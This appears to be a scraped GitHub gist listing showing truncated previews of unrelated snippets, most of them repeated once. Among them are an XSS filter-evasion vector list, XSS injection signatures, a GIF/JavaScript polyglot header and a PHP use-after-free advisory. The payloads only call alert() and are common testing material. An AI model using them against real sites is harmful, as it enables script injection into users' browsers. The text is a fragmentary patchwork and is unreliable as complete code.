Alex santaklouse

## annoying.js
/**
 * Annoying.js - How to be an asshole to your users
 *
 * DO NOT EVER, EVER USE THIS.
 *
 * Copyright (c) 2011 Kilian Valkhof (kilianvalkhof.com)
 * Visit https://gist.github.com/767982 for more information and changelogs.
 * Visit http://kilianvalkhof.com/2011/javascript/annoying-js-how-to-be-an-asshole/ for the introduction and weblog
 * Check out https://gist.github.com/942745 if you want to annoy developer instead of visitors
 *

## goo.gl.sh
#!/usr/bin/env bash
# Usage: goo.gl [URL]
#
# Shorten a URL using the Google URL Shortener service (http://goo.gl).
goo.gl() {
	[[ ! $1 ]] && { echo -e "Usage: goo.gl [URL]\n\nShorten a URL using the Google URL Shortener service (http://goo.gl)."; return; }
	curl -qsSL -m10 --connect-timeout 10 \
		'https://www.googleapis.com/urlshortener/v1/url' \
		-H 'Content-Type: application/json' \
		-d '{"longUrl":"'${1//\"/\\\"}'"}' |

## 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

## README.md

      
              1 file
            
          
              68 forks
            
          
              87 comments
            
          
              359 stars
            
          
                jonathantneal
                / README.md
            
            
              Last active
              March 19, 2024 23:31
            
              
                Local SSL websites on macOS Sierra
              
          
    Local SSL websites on macOS Sierra

These instructions will guide you through the process of setting up local, trusted websites on your own computer.
These instructions are intended to be used on macOS Sierra, but they have been known to work in El Capitan, Yosemite, Mavericks, and Mountain Lion.
NOTE: You may substitute the edit command for nano, vim, or whatever the editor of your choice is. Personally, I forward the edit command to Sublime Text:
alias edit="/Applications/Sublime\ Text.app/Contents/SharedSupport/bin/subl"

  
## gifjs.asm
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment

; inspired by Saumil Shah's Deadly Pixels presentation

; Ange Albertini, BSD Licence 2013

; yamal gifjs.asm -o img.gif

WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment

## XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
/* Remote File Include with HTML TAGS via XSS.Cx  */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>

## .md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                chtg
                / .md
            
            
              Created
              August 26, 2015 11:04
            
              
                Use After Free Vulnerability in unserialize() with GMP
              
          
    #Use After Free Vulnerability in unserialize() with GMP
Taoguang Chen <@chtg> - Write Date: 2015.8.17 - Release Date: 2015.9.4

A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions

Affected is PHP 5.6 < 5.6.13

  
## HowToOTG.md

      
              1 file
            
          
              86 forks
            
          
              103 comments
            
          
              665 stars
            
          
                gbaman
                / HowToOTG.md
            
            
              Last active
              July 19, 2024 11:47
            
              
                Simple guide for setting up OTG modes on the Raspberry Pi Zero
              
          
    Raspberry Pi Zero OTG Mode

Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).
The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.

Because of this, if setup to, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!

It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.

It is also important to note, that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int

  
## sshd_tunnel.sh
#!/bin/sh

AUTHORIZED_KEYS=authorized_keys
HOST_RSA_KEY=ssh_host_rsa_key
SSHD=/usr/sbin/sshd
PORT=8443

case "$AUTHORIZED_KEYS" in /*) ;; *) AUTHORIZED_KEYS=$PWD/$AUTHORIZED_KEYS ;; esac
case "$HOST_RSA_KEY"    in /*) ;; *) HOST_RSA_KEY=$PWD/$HOST_RSA_KEY ;; esac

## tor.service
$ cat /usr/lib/systemd/system/tor.service
[Unit]
Description=Anonymizing overlay network for TCP
After=syslog.target network.target nss-lookup.target
PartOf=tor-master.service
ReloadPropagatedFrom=tor-master.service

[Service]
Type=notify
NotifyAccess=all
	/**
	* Annoying.js - How to be an asshole to your users
	*
	* DO NOT EVER, EVER USE THIS.
	*
	* Copyright (c) 2011 Kilian Valkhof (kilianvalkhof.com)
	* Visit https://gist.github.com/767982 for more information and changelogs.
	* Visit http://kilianvalkhof.com/2011/javascript/annoying-js-how-to-be-an-asshole/ for the introduction and weblog
	* Check out https://gist.github.com/942745 if you want to annoy developer instead of visitors
	*
	#!/usr/bin/env bash
	# Usage: goo.gl [URL]
	#
	# Shorten a URL using the Google URL Shortener service (http://goo.gl).
	goo.gl() {
	[[ ! $1 ]] && { echo -e "Usage: goo.gl [URL]\n\nShorten a URL using the Google URL Shortener service (http://goo.gl)."; return; }
	curl -qsSL -m10 --connect-timeout 10 \
	'https://www.googleapis.com/urlshortener/v1/url' \
	-H 'Content-Type: application/json' \
	-d '{"longUrl":"'${1//\"/\\\"}'"}' \|
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>
	; a hand-made GIF containing valid JavaScript code
	; abusing header to start a JavaScript comment

	; inspired by Saumil Shah's Deadly Pixels presentation

	; Ange Albertini, BSD Licence 2013

	; yamal gifjs.asm -o img.gif

	WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
	/* Remote File Include with HTML TAGS via XSS.Cx */
	/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
	/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
	/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
	/* Updated September 29, 2014 */
	/* RFI START */
	<img language=vbs src=<b onerror=alert#1/1#>
	<isindex action="javas&Tab;cript:alert(1)" type=image>
	"]<img src=1 onerror=alert(1)>
	<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
	#!/bin/sh

	AUTHORIZED_KEYS=authorized_keys
	HOST_RSA_KEY=ssh_host_rsa_key
	SSHD=/usr/sbin/sshd
	PORT=8443

	case "$AUTHORIZED_KEYS" in /) ;; ) AUTHORIZED_KEYS=$PWD/$AUTHORIZED_KEYS ;; esac
	case "$HOST_RSA_KEY" in /) ;; ) HOST_RSA_KEY=$PWD/$HOST_RSA_KEY ;; esac
	$ cat /usr/lib/systemd/system/tor.service
	[Unit]
	Description=Anonymizing overlay network for TCP
	After=syslog.target network.target nss-lookup.target
	PartOf=tor-master.service
	ReloadPropagatedFrom=tor-master.service

	[Service]
	Type=notify
	NotifyAccess=all